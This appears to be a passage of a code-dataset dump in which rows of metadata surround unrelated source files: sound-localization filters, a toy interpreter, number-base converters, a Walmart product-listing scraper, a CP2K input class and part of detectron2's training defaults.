"]},{"start":{"row":58,"column":8},"end":{"row":58,"column":10},"action":"insert","lines":["# "]},{"start":{"row":59,"column":8},"end":{"row":59,"column":10},"action":"insert","lines":["# "]},{"start":{"row":60,"column":8},"end":{"row":60,"column":10},"action":"insert","lines":["# "]},{"start":{"row":61,"column":8},"end":{"row":61,"column":10},"action":"insert","lines":["# "]},{"start":{"row":62,"column":8},"end":{"row":62,"column":10},"action":"insert","lines":["# "]},{"start":{"row":63,"column":8},"end":{"row":63,"column":10},"action":"insert","lines":["# "]},{"start":{"row":64,"column":8},"end":{"row":64,"column":10},"action":"insert","lines":["# "]}]]},"ace":{"folds":[],"scrolltop":666.3999999906868,"scrollleft":0,"selection":{"start":{"row":65,"column":0},"end":{"row":65,"column":0},"isBackwards":false},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":{"row":15,"state":"start","mode":"ace/mode/python"}},"timestamp":1592906972810,"hash":"ce0920fecde91300d72a35401bc1c2c407132fa2"} | [
"senammohanakrishna@gmail.com"
] | senammohanakrishna@gmail.com |
3595f3dc264996d3f27dba5091335b3d7999d3c1 | 70fccf84f1f8dbca2d289e4c983a45b6d715f5df | /utils/prob.py | 912341c94261659e690a170ee4c042f344caaa69 | [] | no_license | SensorsAudioINI/SpikeSeparation | ca05b4e08e90127bf82226ebc4ba6d7a0618ec94 | 6807b0914d90f6ae66e550be9ad50483b9c3d983 | refs/heads/master | 2021-03-30T17:47:27.209746 | 2020-04-03T14:42:46 | 2020-04-03T14:42:46 | 122,992,649 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,844 | py | from __future__ import division
from scipy.stats import norm
import warnings
import numpy as np
import progressbar
from matplotlib import pyplot
# Speaker-index / azimuth-angle lookup tables (pairs of [index, degrees]) for
# the two recording setups; index_angles_01 is the default used by
# get_transition_probabilities below.
index_angles_01 = np.array([[12, 0], [11, -30], [9, -90], [8, -60], [4, 60], [3, 90], [1, 30]])
index_angles_02 = np.array([[1, 30], [2, 60], [3, 90], [4, 120], [5, 150], [6, 180], [7, 210], [8, 240], [9, 270],
                            [10, 300], [11, 330], [12, 0]])
def get_estimates(itds, initial_estimate, transition_probabilities, itd_dict, prior, save_to_file=None, verbose=False):
    """Implements the basic probabilistic model.
    Args:
        :param itds: The itds as a numpy array, of dtype np.float32, in seconds.
        :param initial_estimate: The initial estimate as numpy array of size num_possible_locations. Note that the array
         should be a valid probability distribution, so should sum upto 1.
        :param transition_probabilities: The transition probabilities, as a numpy 2D array. Again, the rows must be
         valid probability distributions.
        :param itd_dict: The itd mapping between the quantized itds and their indices in array format.
        :param prior: The prior distributions, as numpy 2D array, rows should be valid probability distributions.
        :param save_to_file: If not None, filename is expected, to which the estimates and argmax_estimates are saved.
        :param verbose: If True, then a progressbar display of the progress will be displayed.
    Returns:
        :return: A tuple (estimates, argmax_estimates)
        estimates: A numpy 2D array, with the probability estimates at every itd.
        argmax_estimates: A numpy array, with the argmax of the probability estimate at every itd.
    """
    localization_estimate = initial_estimate
    num_itds = len(itds)
    estimates = np.zeros(shape=(num_itds, prior.shape[0]), dtype=np.float32)
    argmax_estimates = np.zeros(shape=num_itds, dtype=np.int32)
    # The third-party progress bar is only constructed when verbose output is
    # requested; otherwise a no-op pass-through is used.
    bar = progressbar.ProgressBar() if verbose else (lambda iterable: iterable)
    for itd_idx, itd in bar(enumerate(itds)):
        # Prediction step: propagate the previous estimate through the
        # location transition model.
        position_matrix = np.multiply(transition_probabilities, localization_estimate)
        position_probability = np.sum(position_matrix, axis=1)
        # Observation step: quantize the itd to its nearest dictionary bin and
        # read that bin's likelihood for every location (the bin index is the
        # same for all locations, so compute it once).
        bin_idx = np.argmin(np.abs(itd_dict - itd))
        motion_probability = prior[:, bin_idx]
        probability_to_normalize = np.multiply(motion_probability, position_probability)
        localization_estimate = probability_to_normalize / np.sum(probability_to_normalize)
        estimates[itd_idx] = localization_estimate
        argmax_estimates[itd_idx] = np.argmax(localization_estimate)
        if np.isnan(np.sum(localization_estimate)):
            warnings.warn('Something wrong with the estimate.')
    if save_to_file is not None:
        np.savez(save_to_file, estimates=estimates, argmax_estimates=argmax_estimates)
    # Bug fix: `np.float` was removed in NumPy 1.24; use the builtin float.
    return np.array(estimates, dtype=np.float32), np.array(argmax_estimates, dtype=float)
def get_priors(itd_streams, max_itd=800e-6, num_bins=80, save_to_file=None):
    """Estimate per-location ITD prior distributions from separated streams.

    Args:
        :param itd_streams: One itd stream (array-like, seconds) per location.
        :param max_itd: Half-width of the histogram range, in seconds.
        :param num_bins: Number of quantization bins.
        :param save_to_file: Optional filename the priors are saved to (npy).
    Returns:
        :return: 2D numpy array, one normalized histogram row per location.
    """
    priors = np.zeros(shape=(len(itd_streams), num_bins), dtype=np.float32)
    for row, stream in enumerate(itd_streams):
        counts, _ = np.histogram(stream, bins=num_bins, range=(-max_itd, max_itd))
        priors[row] = counts / len(stream)
    if save_to_file is not None:
        np.save(save_to_file, priors)
    return priors
def get_transition_probabilities(index_angles=None, sigma=5):
    """Get Gaussian transition probabilities based on angles and a given sigma.
    Args:
        :param index_angles: The list of tuples with location index and the corresponding angle.
            Defaults to ``index_angles_01`` (bound at call time, not def time).
        :param sigma: The sigma for the Gaussian distributions.
    Returns:
        :return: A numpy 2D array; row i holds the Gaussian pdf centered on
        angle i, evaluated at every angle (in the original row order).
    """
    if index_angles is None:
        index_angles = index_angles_01
    angles = index_angles[:, 1]
    transition_probabilities = np.zeros(shape=(len(index_angles), len(index_angles)), dtype=np.float32)
    for row, index_angle in enumerate(index_angles):
        mean = index_angle[1]
        # The pdf is evaluated elementwise, so it can be applied directly to
        # the angles in their original order (the former sort/dict round-trip
        # produced exactly the same values).
        transition_probabilities[row] = norm(mean, sigma).pdf(angles)
    return transition_probabilities
def moving_average(estimates, window_length=10):
    """Smooth the estimates with a trailing moving-average window.

    Positions where a full window no longer fits are padded with the last
    fully-averaged value, so the output has the same length as the input.

    Args:
        :param estimates: The estimates from the probabilistic model.
        :param window_length: The window length for the smoothing.
    Returns:
        :return: The smoothed estimates, as a numpy array.
    """
    smoothed = np.zeros_like(estimates)
    n = len(estimates)
    last_full = n - window_length
    for start in range(last_full + 1):
        smoothed[start] = np.mean(estimates[start:start + window_length], axis=0)
    for tail in range(last_full + 1, n):
        smoothed[tail] = smoothed[last_full]
    return smoothed
def identity(x):
    """Return *x* unchanged; used as a no-op stand-in for a progress bar."""
    return x
def get_kalman_estimates(itds, h_k=-178., r_k=210. ** 2, f_k=1., q_k=(0.05) ** 2,
                         init_state=np.array(0), init_var_state=np.array(0) ** 2,
                         version='basic', itd_shift=37.20):
    """Run a scalar Kalman filter over a stream of ITD measurements.

    Args:
        :param itds: ITD measurements in seconds; converted to microseconds
            and offset by ``itd_shift`` before filtering.
        :param h_k: Observation model (maps state to expected ITD, in us).
        :param r_k: Observation noise variance.
        :param f_k: State transition coefficient.
        :param q_k: Process noise variance.
        :param init_state: Initial state estimate.
        :param init_var_state: Initial state variance.
        :param version: Unused; kept for interface compatibility.
        :param itd_shift: Constant offset (us) added to the measurements.
    Returns:
        :return: A tuple (estimates, variances) of numpy arrays with the
        posterior state estimate and variance after every measurement.
    """
    observations = itds * 1e6 + itd_shift
    estimates, variances = [], []
    x_k_k = init_state
    p_k_k = init_var_state
    for z in observations:
        # Predict.
        x_k_km = f_k * x_k_k
        p_k_km = f_k * p_k_k * f_k + q_k
        # Update.
        y_k = z - h_k * x_k_km          # innovation
        s_k = r_k + h_k * p_k_km * h_k  # innovation variance
        k_k = p_k_km * h_k / s_k        # Kalman gain
        x_k_k = x_k_km + k_k * y_k
        p_k_k = p_k_km - k_k * h_k * p_k_km
        # (Dead post-fit residual computation removed; it was never used.)
        estimates.append(x_k_k)
        variances.append(p_k_k)
    return np.array(estimates), np.array(variances)
# Manual smoke test: visualize the Gaussian transition matrix for the
# seven-speaker setup. Not exercised by automated tests.
if __name__ == '__main__':
    test_index_angles = np.array([[12, 0], [11, -30], [9, -90], [8, -60], [4, 60], [3, 90], [1, 30]])
    test_transition_probabilities = get_transition_probabilities(test_index_angles, sigma=5)
    pyplot.imshow(test_transition_probabilities, aspect='auto', interpolation='nearest')
    pyplot.show()
    print('Hello world, nothing to test for now.')
| [
"enea.ceolini@gmail.com"
] | enea.ceolini@gmail.com |
3eb61ccad91e5d6796d947549f7ec095b2ec06a7 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/8/uov.py | fdf45423c372262f0f9bdaf23dd89445225841dd | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
    """Print the tokens found between a pair of standalone double-quote tokens.

    *lineRemaining* is a list of whitespace-split tokens. When the first and
    last tokens are each a lone ``"``, the tokens between them are printed
    joined by single spaces; a bare quote pair prints an empty line. Any other
    input (including an empty list) is silently ignored.
    """
    # Bug fix: ported Python 2 print statements to Python 3 calls, and guard
    # against an empty token list (previously an IndexError).
    if lineRemaining and lineRemaining[0] == '"' and lineRemaining[-1] == '"':
        if len(lineRemaining) > 2:
            # data to print: drop the surrounding quote tokens.
            print(' '.join(lineRemaining[1:-1]))
        else:
            print()
def main(fileName):
    # Interpret each line of the input file as a command: lines starting with
    # the keyword 'uOV' are handed to printFunction; any other keyword prints
    # ERROR and aborts processing of the rest of the file.
    # NOTE(review): a blank line would raise IndexError on data[0] — confirm
    # the input format never contains empty lines.
    with open(fileName) as f:
        for line in f:
            data = line.split()
            if data[0] == 'uOV':
                printFunction(data[1:])
            else:
                print 'ERROR'
                return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
8a76865e6a5cdbbe7fa9df6795eea725d172e6c9 | 1bbead5d97a279383ae9ae6e4ee70af5d69f1e92 | /tokipona1000/init_conll.py | e9dc534168a128e9f2bcd38130063f4255f8815c | [] | no_license | m-rey/tokipona-corpus-collection | de948540b5045477418b88b0fc9594794cb5f921 | fd8988273f6dfbdad4aaffc12447d0e63284e5d0 | refs/heads/main | 2023-09-05T01:33:39.482149 | 2021-11-20T17:55:34 | 2021-11-20T17:55:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 551 | py | from ilonimi.normalizer import Normalizer
from ilonimi.tokenizer import Tokenizer
def main():
    """Convert tokipona1000.txt into a minimal CoNLL-style annotation dump."""
    normalizer = Normalizer()
    tokenizer = Tokenizer()
    with open('tokipona1000.txt') as f:
        for line_no, raw in enumerate(f, start=1):
            # Normalize then tokenize each stripped input line.
            sent = tokenizer(normalizer(raw.strip()))
            print('# {}: {}'.format(line_no, sent))
            # One row per token: index, form, and placeholder POS/head/deprel.
            for tok_no, tok in enumerate(sent.split(), start=1):
                print('{} {} {} {} {}'.format(tok_no, tok, 'X', '0', 'x'))
            print('')
if __name__ == '__main__':
    # Entry point intentionally disabled; uncomment to regenerate the dump.
    #main()
    pass
| [
"nymwa0@gmail.com"
] | nymwa0@gmail.com |
730bd4b0df6459b044a7418ae3f0717c02a95a42 | 06bd2a6845afc7b5617602c796de7dedf15ddaf8 | /app/__init__.py | de3224552da192f1b39776d8ac450c412a085898 | [] | no_license | mathssiqueira/simple-landing | 4d94a548b84b3799475487bbbb75d4366b69b890 | ce528747b31ff30f9def15bc63530d281610bb2f | refs/heads/master | 2023-04-30T15:56:35.181783 | 2021-05-21T20:58:29 | 2021-05-21T20:58:29 | 369,647,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 115 | py | from flask import Flask
# Module-level Flask application instance; other modules import `app` from here.
app = Flask(__name__)
# Load settings from the project-level `config` module by dotted path.
app.config.from_object('config')
from app.controllers import routes | [
"root@localhost.localdomain"
] | root@localhost.localdomain |
acc4b47ecab5e6f2765e24d3ccdf1f6b96e4655a | a797793842f433251d2ab0bafb0ebe800b89a076 | /rulet.py | 8d79359d829dea8fd95428ecdf71213eb4e4120b | [] | no_license | irhadSaric/Instrukcije | b2f576bceb7e75f5fa65bfef99c9cde53d597b32 | 9ac8979b824babdeef3712ab9d23c764536d57b0 | refs/heads/master | 2020-09-28T09:00:08.389651 | 2020-02-01T20:33:59 | 2020-02-01T20:33:59 | 226,740,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | import random
# Monte Carlo estimate of winning a single-number roulette bet:
# play 10000 rounds; each round pick a random number and compare it with the
# wheel's random outcome. Numbers run 0..36, i.e. 37 equally likely slots,
# so the expected relative frequency is 1/37 (~0.027).
brojiPobjede = 0  # win counter
for i in range(10000):
    mojBroj = random.randint(0, 36)      # player's pick
    ruletovBroj = random.randint(0, 36)  # wheel outcome
    if mojBroj == ruletovBroj:
        brojiPobjede += 1
print(brojiPobjede / 10000) | [
"irhad.saric@hotmail.com"
] | irhad.saric@hotmail.com |
7500539e4b77c87262170eb516cec1aceeee07e0 | f00ad57c98e554470a72511dda7a7bfd160aca19 | /linear_structure/stack/number_converter.py | c3c80bda42a7c14c042346c0ebb05009899d9057 | [] | no_license | fanzhangg/algorithm-problems | d60115210aaaffcd094b34b9db5b46dadf93fe9e | 43b111ad625f197ba0905abceab9ee4484284e08 | refs/heads/master | 2021-07-12T20:24:46.265700 | 2020-07-06T17:58:31 | 2020-07-06T17:58:31 | 171,220,135 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,684 | py | from stack import Stack
def dec_to_bin(num: int) -> str:
    """
    Convert a non-negative integer into its binary string.
    Algorithm: Divide By 2
    - Continuously divide the number by 2, pushing each remainder on a stack
    - Popping the stack yields the remainders in reverse order, which is the
      binary string
    i.e. The binary string of 233 is 11101001
        1 | 233
        0 | 116
        0 | 58
        1 | 29
        0 | 14
        1 | 7
        1 | 3
        1 | 1
            0
    :param num: a non-negative integer
    :return: the binary string representation of num
    :raises ValueError: if num is negative (the divide-by-2 loop would never
        terminate for negative numbers under Python's floor division)
    """
    if num < 0:
        raise ValueError("num must be non-negative")
    if num == 0:
        # The loop below never runs for 0; without this guard the function
        # previously returned an empty string.
        return "0"
    stack = Stack()
    while num != 0:
        num, reminder = divmod(num, 2)
        stack.push(reminder)
    digits = []
    while not stack.isempty():
        digits.append(str(stack.pop()))
    # Single join instead of repeated string concatenation (quadratic).
    return "".join(digits)
def dec_to_hex(num: int) -> str:
    """
    Convert a decimal number to a hexadecimal string
    :param num: a non-negative decimal number
    :return: a hexadecimal string (A for 10, B for 11, ...)
    :raises ValueError: if num is negative (the loop would never terminate)
    """
    if num < 0:
        raise ValueError("num must be non-negative")
    if num == 0:
        # Loop below is skipped for 0; previously this returned "".
        return "0"
    digits = "0123456789ABCDEF"
    stack = Stack()
    while num != 0:
        num, reminder = divmod(num, 16)
        stack.push(reminder)
    out = []
    while not stack.isempty():
        out.append(digits[stack.pop()])
    # Single join instead of repeated string concatenation.
    return "".join(out)
def dec_to_oct(num: int) -> str:
    """
    Convert a decimal number to an octal string
    :param num: a non-negative decimal number
    :return: the octal string representation of num
    :raises ValueError: if num is negative (the loop would never terminate)
    """
    if num < 0:
        raise ValueError("num must be non-negative")
    if num == 0:
        # Loop below is skipped for 0; previously this returned "".
        return "0"
    stack = Stack()
    while num != 0:
        num, reminder = divmod(num, 8)
        stack.push(reminder)
    out = []
    while not stack.isempty():
        out.append(str(stack.pop()))
    # Single join instead of repeated string concatenation.
    return "".join(out)
if __name__ == "__main__":
print(dec_to_oct(25))
print(dec_to_hex(256))
| [
"vanadiumzhang@gmail.com"
] | vanadiumzhang@gmail.com |
ec5f21317444f9e667374731636bce4592443ac0 | d55f8836d27dcbe56ce62623f1a69f33c0fd950d | /UpWork_Projects/andy_upwork/wallmart/wallmart/spiders/wmProducts.py | 3e363834991c938048b239d63a724da91334d921 | [
"MIT"
] | permissive | SurendraTamang/Web-Scrapping | f12f0f8fcb4b6186ecab38c8036181e4d1560bed | 2bb60cce9010b4b68f5c11bf295940832bb5df50 | refs/heads/master | 2022-11-11T10:32:31.405058 | 2020-06-17T19:34:33 | 2020-06-17T19:34:33 | 273,258,179 | 0 | 1 | null | 2020-06-18T14:20:43 | 2020-06-18T14:20:42 | null | UTF-8 | Python | false | false | 9,336 | py | # -*- coding: utf-8 -*-
import scrapy
from scrapy_selenium import SeleniumRequest
from scrapy import Selector
import time
import pandas as pd
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
class WmproductsSpider(scrapy.Spider):
    """
    Crawl Walmart category pages listed in an Excel sheet and yield one item
    per product (url, name, price, category levels 1-4).

    Three page layouts are handled:
    - a plain paginated product grid (scraped in place, lvl4_cat is None),
    - a "Shop by Category" link list,
    - a "Shop by category" tile grid.
    For the latter two, each sub-category page is opened in a second browser
    tab and paginated, recording the sub-category name as lvl4_cat.
    """
    name = 'wmProducts'
    # Category landing pages plus their level-1..3 labels.
    df = pd.read_excel("D:/sipun/Web-Scrapping/UpWork_Projects/andy_upwork/wallmart/links_main.xlsx", sheet_name='urls')

    def start_requests(self):
        # Single seed request; all subsequent navigation happens via Selenium.
        yield SeleniumRequest(
            url="https://www.walmart.com",
            wait_time=6,
            callback=self.parse
        )

    def parse(self, response):
        driver = response.meta['driver']
        for _, value in self.df.iterrows():
            driver.get(value['url'])
            time.sleep(2)
            resp_obj = Selector(text=driver.page_source)
            # Detect which of the three known layouts this category page uses.
            check1 = resp_obj.xpath("//div[@data-type='items']")
            check2 = resp_obj.xpath("//span[text()='Shop by Category' or text()='Shop by category']/parent::span/parent::button/following-sibling::div/div/ul/li")
            check3 = resp_obj.xpath("//h2[text()='Shop by category']/parent::div/parent::div/following-sibling::div//div[@class='TempoCategoryTile-tile valign-top']")
            if check1:
                # Product grid directly on the landing page: no level-4 category.
                yield from self._scrape_pages(driver, value, None)
            elif check2:
                yield from self._scrape_subcategories(
                    driver, value, check2, ".//a/span/text()", ".//a/@href")
            elif check3:
                yield from self._scrape_subcategories(
                    driver, value, check3, ".//span/text()", ".//following-sibling::a/@href")
            # else: unrecognized layout -- skip this category silently.

    def _scrape_subcategories(self, driver, value, nodes, name_xpath, url_xpath):
        # Open sub-categories in a second tab so the first tab keeps the
        # category list; close the tab and switch back when done.
        driver.execute_script("window.open('');")
        driver.switch_to.window(driver.window_handles[1])
        for node in nodes:
            lvl4_cat = node.xpath(name_xpath).get()
            url = node.xpath(url_xpath).get()
            driver.get(f"https://www.walmart.com{url}")
            yield from self._scrape_pages(driver, value, lvl4_cat)
        driver.close()
        driver.switch_to.window(driver.window_handles[0])

    def _scrape_pages(self, driver, value, lvl4_cat):
        # Walk the paginated product grid starting from the page currently
        # loaded in `driver`, yielding one item dict per product.
        cntr = 1
        while True:
            resp_obj = Selector(text=driver.page_source)
            for prods in resp_obj.xpath("//div[@data-type='items']"):
                yield self._build_item(prods, value, lvl4_cat)
            cntr += 1
            if resp_obj.xpath("//span[text()='Next Page']/parent::button"):
                next_page = resp_obj.xpath(f"//ul[@class='paginator-list']/li/a[text()='{cntr}']/@href").get()
                driver.get(f"https://www.walmart.com{next_page}")
                time.sleep(2)
            else:
                break

    @staticmethod
    def _build_item(prods, value, lvl4_cat):
        # Two markups exist for a product card; fall back to the
        # "Product Title" variant when the gridview one is absent.
        product_url = f'''https://www.walmart.com{prods.xpath(".//div[@class='search-result-product-title gridview']/a/@href").get()}'''
        product_name = prods.xpath("normalize-space(.//div[@class='search-result-product-title gridview']/a/span/text())").get()
        price = prods.xpath("normalize-space(.//span[@class='price-main-block']/span/span/text())").get()
        if not product_name:
            product_url = f'''https://www.walmart.com{prods.xpath(".//span[text()='Product Title']/parent::div/a/@href").get()}'''
            product_name = prods.xpath("normalize-space(.//span[text()='Product Title']/parent::div/a/span/text())").get()
        if not price:
            # Price-range variant: "low - high".
            price = f'''{prods.xpath("normalize-space(.//span[@class='price price-main'][1]/span/text())").get()} - {prods.xpath("normalize-space(.//span[@class='price price-main'][2]/span/text())").get()}'''
        return {
            'product_url': product_url,
            'product_name': product_name,
            'product_price': price,
            'lvl1_cat': value['lvl1_cat'],
            'lvl2_cat': value['lvl2_cat'],
            'lvl3_cat': value['lvl3_cat'],
            'lvl4_cat': lvl4_cat,
        }
| [
"p.byom26@gmail.com"
] | p.byom26@gmail.com |
21502344755f8261134442bd768bce21d57d2f29 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02389/s111149243.py | 819894f3d827de376038b5054bffcf2855fbd562 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 60 | py | a, b = map(int, input().split())
print(a * b, (a + b) << 1)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
5c09566cc272f32a6131fcd7db6e831101f055f0 | add74ecbd87c711f1e10898f87ffd31bb39cc5d6 | /xcp2k/classes/_print13.py | a7e6fa4811794eca39b339bb74efedcf02cf7cbe | [] | no_license | superstar54/xcp2k | 82071e29613ccf58fc14e684154bb9392d00458b | e8afae2ccb4b777ddd3731fe99f451b56d416a83 | refs/heads/master | 2021-11-11T21:17:30.292500 | 2021-11-06T06:31:20 | 2021-11-06T06:31:20 | 62,589,715 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | from xcp2k.inputsection import InputSection
from xcp2k.classes._program_run_info9 import _program_run_info9
from xcp2k.classes._temperature_colvar1 import _temperature_colvar1
from xcp2k.classes._colvar1 import _colvar1
from xcp2k.classes._hills1 import _hills1
class _print13(InputSection):
def __init__(self):
InputSection.__init__(self)
self.PROGRAM_RUN_INFO = _program_run_info9()
self.TEMPERATURE_COLVAR = _temperature_colvar1()
self.COLVAR = _colvar1()
self.HILLS = _hills1()
self._name = "PRINT"
self._subsections = {'PROGRAM_RUN_INFO': 'PROGRAM_RUN_INFO', 'TEMPERATURE_COLVAR': 'TEMPERATURE_COLVAR', 'COLVAR': 'COLVAR', 'HILLS': 'HILLS'}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
e76b1d9bfb455dd5ac8a65e32ae019f5a20448aa | 3c9d06b1ebf289d5f22cfd53c35e3ea1e6500c36 | /detectron2/engine/defaults.py | 396943e06f4a3da4e44ff5a53a59418437a96fa3 | [
"Apache-2.0"
] | permissive | huangzehao/detectron2 | 2331115e6b6c4069a11c99fb5deec8073cf7442e | 2455e4790f470bba54299c049410fc0713ae7529 | refs/heads/master | 2021-06-27T19:46:05.908074 | 2021-04-05T17:32:46 | 2021-04-05T17:33:34 | 217,011,286 | 1 | 1 | Apache-2.0 | 2019-10-23T08:49:54 | 2019-10-23T08:49:54 | null | UTF-8 | Python | false | false | 24,859 | py | # -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates.
"""
This file contains components with some default boilerplate logic user may need
in training / testing. They will not work for everyone, but many users may find them useful.
The behavior of functions/classes in this file is subject to change,
since they are meant to represent the "common default behavior" people need in their projects.
"""
import argparse
import logging
import os
import sys
from collections import OrderedDict
from typing import Optional
import torch
from fvcore.nn.precise_bn import get_bn_modules
from torch.nn.parallel import DistributedDataParallel
import detectron2.data.transforms as T
from detectron2.checkpoint import DetectionCheckpointer
from detectron2.data import (
MetadataCatalog,
build_detection_test_loader,
build_detection_train_loader,
)
from detectron2.evaluation import (
DatasetEvaluator,
inference_on_dataset,
print_csv_format,
verify_results,
)
from detectron2.modeling import build_model
from detectron2.solver import build_lr_scheduler, build_optimizer
from detectron2.utils import comm
from detectron2.utils.collect_env import collect_env_info
from detectron2.utils.env import TORCH_VERSION, seed_all_rng
from detectron2.utils.events import CommonMetricPrinter, JSONWriter, TensorboardXWriter
from detectron2.utils.file_io import PathManager
from detectron2.utils.logger import setup_logger
from . import hooks
from .train_loop import AMPTrainer, SimpleTrainer, TrainerBase
__all__ = [
"default_argument_parser",
"default_setup",
"default_writers",
"DefaultPredictor",
"DefaultTrainer",
]
def default_argument_parser(epilog=None) -> argparse.ArgumentParser:
    """
    Create a parser with some common arguments used by detectron2 users.
    Args:
        epilog (str): epilog passed to ArgumentParser describing the usage.
    Returns:
        argparse.ArgumentParser:
    """
    parser = argparse.ArgumentParser(
        epilog=epilog
        or f"""
Examples:
Run on single machine:
    $ {sys.argv[0]} --num-gpus 8 --config-file cfg.yaml
Change some config options:
    $ {sys.argv[0]} --config-file cfg.yaml MODEL.WEIGHTS /path/to/weight.pth SOLVER.BASE_LR 0.001
Run on multiple machines:
    (machine0)$ {sys.argv[0]} --machine-rank 0 --num-machines 2 --dist-url <URL> [--other-flags]
    (machine1)$ {sys.argv[0]} --machine-rank 1 --num-machines 2 --dist-url <URL> [--other-flags]
""",
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument("--config-file", default="", metavar="FILE", help="path to config file")
    parser.add_argument(
        "--resume",
        action="store_true",
        help="Whether to attempt to resume from the checkpoint directory. "
        "See documentation of `DefaultTrainer.resume_or_load()` for what it means.",
    )
    parser.add_argument("--eval-only", action="store_true", help="perform evaluation only")
    parser.add_argument("--num-gpus", type=int, default=1, help="number of gpus *per machine*")
    parser.add_argument("--num-machines", type=int, default=1, help="total number of machines")
    parser.add_argument(
        "--machine-rank", type=int, default=0, help="the rank of this machine (unique per machine)"
    )
    # PyTorch still may leave orphan processes in multi-gpu training.
    # Therefore we use a deterministic way to obtain port,
    # so that users are aware of orphan processes by seeing the port occupied.
    port = 2 ** 15 + 2 ** 14 + hash(os.getuid() if sys.platform != "win32" else 1) % 2 ** 14
    parser.add_argument(
        "--dist-url",
        default="tcp://127.0.0.1:{}".format(port),
        help="initialization URL for pytorch distributed backend. See "
        "https://pytorch.org/docs/stable/distributed.html for details.",
    )
    # REMAINDER collects all trailing tokens as free-form KEY VALUE config overrides.
    parser.add_argument(
        "opts",
        help="Modify config options by adding 'KEY VALUE' pairs at the end of the command. "
        "See config references at "
        "https://detectron2.readthedocs.io/modules/config.html#config-references",
        default=None,
        nargs=argparse.REMAINDER,
    )
    return parser
def default_setup(cfg, args):
    """
    Perform some basic common setups at the beginning of a job, including:
    1. Set up the detectron2 logger
    2. Log basic information about environment, cmdline arguments, and config
    3. Backup the config to the output directory
    Args:
        cfg (CfgNode): the full config to be used
        args (argparse.NameSpace): the command line arguments to be logged
    """
    output_dir = cfg.OUTPUT_DIR
    # Only the main process creates the output directory.
    if comm.is_main_process() and output_dir:
        PathManager.mkdirs(output_dir)
    rank = comm.get_rank()
    # Two loggers: one for the "fvcore" namespace, one for detectron2 itself.
    setup_logger(output_dir, distributed_rank=rank, name="fvcore")
    logger = setup_logger(output_dir, distributed_rank=rank)
    logger.info("Rank of current process: {}. World size: {}".format(rank, comm.get_world_size()))
    logger.info("Environment info:\n" + collect_env_info())
    logger.info("Command line arguments: " + str(args))
    if hasattr(args, "config_file") and args.config_file != "":
        logger.info(
            "Contents of args.config_file={}:\n{}".format(
                args.config_file, PathManager.open(args.config_file, "r").read()
            )
        )
    logger.info("Running with full config:\n{}".format(cfg))
    if comm.is_main_process() and output_dir:
        # Note: some of our scripts may expect the existence of
        # config.yaml in output directory
        path = os.path.join(output_dir, "config.yaml")
        with PathManager.open(path, "w") as f:
            f.write(cfg.dump())
        logger.info("Full config saved to {}".format(path))
    # make sure each worker has a different, yet deterministic seed if specified
    seed_all_rng(None if cfg.SEED < 0 else cfg.SEED + rank)
    # cudnn benchmark has large overhead. It shouldn't be used considering the small size of
    # typical validation set.
    if not (hasattr(args, "eval_only") and args.eval_only):
        torch.backends.cudnn.benchmark = cfg.CUDNN_BENCHMARK
def default_writers(output_dir: str, max_iter: Optional[int] = None):
    """
    Build the default list of :class:`EventWriter` used during training:
    a :class:`CommonMetricPrinter`, a :class:`JSONWriter` and a
    :class:`TensorboardXWriter`.
    Args:
        output_dir: directory where JSON metrics and tensorboard events are stored
        max_iter: the total number of iterations, if known
    Returns:
        list[EventWriter]: a list of :class:`EventWriter` objects.
    """
    metrics_json = os.path.join(output_dir, "metrics.json")
    # The console printer only reports "common" metrics, so it may not show
    # everything that gets logged.
    writers = [
        CommonMetricPrinter(max_iter),
        JSONWriter(metrics_json),
        TensorboardXWriter(output_dir),
    ]
    return writers
class DefaultPredictor:
    """
    Create a simple end-to-end predictor with the given config that runs on
    single device for a single input image.
    Compared to using the model directly, this class does the following additions:
    1. Load checkpoint from `cfg.MODEL.WEIGHTS`.
    2. Always take BGR image as the input and apply conversion defined by `cfg.INPUT.FORMAT`.
    3. Apply resizing defined by `cfg.INPUT.{MIN,MAX}_SIZE_TEST`.
    4. Take one input image and produce a single output, instead of a batch.
    If you'd like to do anything more fancy, please refer to its source code
    as examples to build and use the model manually.
    Attributes:
        metadata (Metadata): the metadata of the underlying dataset, obtained from
            cfg.DATASETS.TEST.
    Examples:
    ::
        pred = DefaultPredictor(cfg)
        inputs = cv2.imread("input.jpg")
        outputs = pred(inputs)
    """
    def __init__(self, cfg):
        self.cfg = cfg.clone()  # cfg can be modified by model
        self.model = build_model(self.cfg)
        self.model.eval()  # inference mode
        if len(cfg.DATASETS.TEST):
            self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0])
        checkpointer = DetectionCheckpointer(self.model)
        checkpointer.load(cfg.MODEL.WEIGHTS)
